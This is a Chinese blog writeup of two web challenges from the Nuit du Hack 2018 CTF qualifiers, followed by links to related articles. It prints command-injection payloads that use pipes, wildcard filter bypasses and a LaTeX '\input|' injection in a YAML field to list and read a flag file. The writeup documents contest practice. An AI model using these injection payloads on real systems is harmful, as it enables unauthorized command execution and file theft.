Nuit du Hack CTF Quals 2018 writeup (web)

最新推荐文章于 2024-04-13 05:37:19 发布
最新推荐文章于 2024-04-13 05:37:19 发布
阅读量423 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_38094687/article/details/79804078
版权

以下是2道比较简单的web类题目
- Crawl me maybe! (100)
- Linked Out (300)

Crawl me maybe!

打开网站,看到只有一个搜索框
welcome

测试了一下百度,得到了一堆css。查看网络请求,发现向result处post了url。通过wappalyzer分析网站是用ruby写的,这里想办法让它报错。
url[]=1
通过向url赋值一个数组的形式,让它抛异常可以得到报错
可以看到匹配了”flag” “txt” “*” ,且必须同时出现”|” 与”cat”或”ls”
nil和python里的None基本相同。可以猜测文件名大概是flag.txt
url=|ls -a src
src

url=|cat src/.flag.txt

果然禁止访问了
attack
也被禁止了,我们不能用fla的方式查看。那怎么做呢?
实际有很多方式绕过,这里我选一种最简单的也是我立刻想到的

url=|cat src/.fl?g.t?t

得到flag

Linked Out

这道题的大概意思是通过上传一个写好的yml文件,通过latex模板生成对应的简历。是一道latex引发的命令执行问题。
这里有一篇paperhttps://0day.work/hacking-with-latex/

我们通过

skype: BBBBBBBBBBBBBB}\skype{\input|"ls /"}%

的方式覆盖原字段并闭合路径
src
可以发现成功注入代码,看到了flag,那来cat一下

skype: BBBBBBBBBBBBBB}\skype{\input|"cat flag"}%

blank
看来得转一下码:

skype: BBBBBBBBBBBBBB}\skype{\input|"cat flag|base64 "}%

flag
然后base64转码得到flag

摘自https://tipi-hack.github.io/2018/04/01/quals-NDH-18-linked-out.html

黑羽re
关注
Anciety 0CTF/TCTF 2018 总结
jmp esp
04-02 2590
前言 这次跟着lotus-r3kapig打0CTF,题目挺好,学到很多东西,无奈最后实在是菜,题目要么被队友秒了,要么完全不知道怎么下手,确实很有总结的必要。 Time based DAY 1 第一天比较操蛋是我们除了0ctf还有个nuit du ctf要打,两个时间是重合的,比较尴尬,还好nuit du ctf只有一天,难度也还比较有限,加之队友实在给力(感谢@F0r_1st 和...
关于ctf大赛
qq_74223054的博客
10-13 1410
CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。 一.CTF的起源发展 CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。 二.CTF竞赛模式具
0CTF 2018 Quals Bl0g writeup
3569
04-12 779
记录:之前没有做,看着wp稍做了解,复现一遍了解CSP限制虽然刚开始是绕过CSP,但是我觉得绕过和没有绕过没什么区别。0.0Content-Security-Policy: script-src 'self' 'unsafe-inline' Content-Security-Policy: default-src 'none'; script-src 'nonce-BXwvkDpdui1nFUwI...
[网络安全] Dirsearch 工具的安装、使用详细教程(2)
最新发布
2401_84010865的博客
04-13 985
format=FORMAT 报告格式(可用:simple、plain、json、xml、md、csv、html、–auth-type=TYPE 认证类型(basic、digest、bearer、ntlm、jwt)用法:dirsearch.py [-u|–url] 目标 [-e|–extensions] 扩展名 [选项]默认情况下,dirsearch只替换%EXT%关键字为扩展名。-u URL, --url=URL 目标URL,可以使用多个选项指定多个目标URL。
搜索框注入
weixin_30265171的博客
11-07 689
======================================================= 前段时间朋友丢了一个站过来,说是他们学校的。叫我帮忙检测下。 于是看了下。用扫描器扫了下,没有啥可以上传利用的,发现后台,默认和万能密码无效, 无注入点,手工和工具试过了,防注入,COOKIES注入也不行。找不到程序源码,没办法分析。旁注 ? 整站是独立服务器,就一个站,旁注也没办法。难...
2018-10月安恒逆向题目
10-29
2018年10月安恒月赛逆向题目。
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
NUIT:C# 测试框架详解与VS集成
"NUIT使用详解是一篇详细介绍如何在.NET环境下利用NUnit进行单元测试的文章。NUnit是一款针对C#编程语言设计的单元测试框架,属于xUnit家族成员,它充分利用.NET平台的反射和委托等特性,支持多种.NET语言的测试。 ...
NUit for C# Test
03-11
NUit C#单元测试工具
yml yaml配置示例
Hiqingtian的博客
02-01 2281
#普通数据的配置 name: zhangsan #Map或对象数据的配置 persion: age: 18 addr: beijing name: ##行内对象配置 #persion: {name: zhangsan,age: 18,addr: beijing} #配置数据,集合(普通字符串) city: - beijing - shanghai - tianjing ...
N1CTF 2018 lipstick WriteUp (bugku——多彩)
热门推荐
灬彬的博客
09-21 2万+
一开始是在bugku网站上看到这题的。。后来了解到是N1CTF2018国际赛的题。。   将图片下载下来之后放入Stegsolve。。。 看到了这个。。。(杨树林???)再加上题目是lipstick。。。心想着肯定与YSL的口红有关。。。 先分析下。。点击Analyse——>Data Extract 看到有个PK头。。心里有数。。直接save bin 存为zip...
BugKuCTF---sql注入Writeup
驻足
04-22 1504
我的博客 Marsguest’s BLog BugKuCTF—sql注入Writeup 原题地址 http://103.238.227.13:10083/ 首先构造链接 http://103.238.227.13:10083/?id=1' 发现存在过滤,页面没什么反应。右键源文件,发现编码规则GB-2312,猜测为mysql宽字节注入 简单讲解什么是宽字节注入: 1....
volga-ctf-quals-2016 pwn web_of_scicen_250 writeup
jmp esp
11-30 861
基本情况我并没有参加这个比赛,只是作为练习用,所以无法模拟远程,只能本地调试文件是64位的,运行之后先输入名字,然后每次都会输出这个名字,然后问你10道数学题,后面怎样的其实对这个版本的利用来说不是很重要漏洞情况整个函数比较长,不过我还是复制下来方便解释(来源于radare2, 如果不依赖ida的F5, radare2一些时候比ida还好用,特别是在pwn当中):/ (fcn) sub.puts_7
攻防世界-Web萌新-csaw-ctf-2016-quals-mfw(.git泄露、php语句闭合)
Sea_Sand息禅
04-15 4477
打开网页,日常扫描,发现git泄露: git工具下载相关文件(git工具自行百度): 然而flag.php的内容是这样的没什么用,想着也不会这么简单: 网页源码有这一段: 说明flag应该就在flag.php中,再看看index.php,主要是这一部分: <?php if (isset($_GET['page'])) { $page = $_GET['page']; ...
2018巅峰极客writeup(Misc)
Mistsatan
07-30 4385
2018巅峰极客writeup(Misc) 作为一个渣渣,带着去看各路神仙打架的想法报名了这次的“巅峰极客”CTF比赛,7.21第一场线上赛果然从头水到尾。。。 为了方便之后巩固,把近几天学习大佬们的writeup过程中总结整理的内容记录下来,第一次写成博客。
巅峰极客第一场CTF部分writeup
郁离歌丶的博客
07-22 6146
额,上午驾校学车,中午打了会儿安恒的月赛,就来看巅峰极客的题了。时间关系实力原因没做几个emmmm太菜了wa MISC-warmup-100pt 拿到一个bmp文件,套路走一波,右键查看属性emmm啥都没有。 丢到winhex里面也没有什么明显的提示或者信息。 放大招:stegsolve。放在各个颜色通道里面过一遍。 可以明显的看到每个颜色通道的最低位有异常数据。 将数据提取出来 ...
XCTF嘉年华体验赛逆向writeup
weixin_43090100的博客
08-29 939
mark一次ctf逆向 一共有两道题:re1和re2 re1签到题 下载附件发现是elf文件,直接上ida,F5之后代码一目了然 可以看出来flag是一个四位数,每一位相加是23,十位除个位等于2,百位减十位等于-1,千位模十位等于3,解四元方程求出来就可以了。 flag是9563 ——————————————————————————————————————————...
Seccon CTF 2016 biscuiti writeup
Bendawang's Blog
12-15 3440
web300 biscuiti 题解 (web + crypto)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值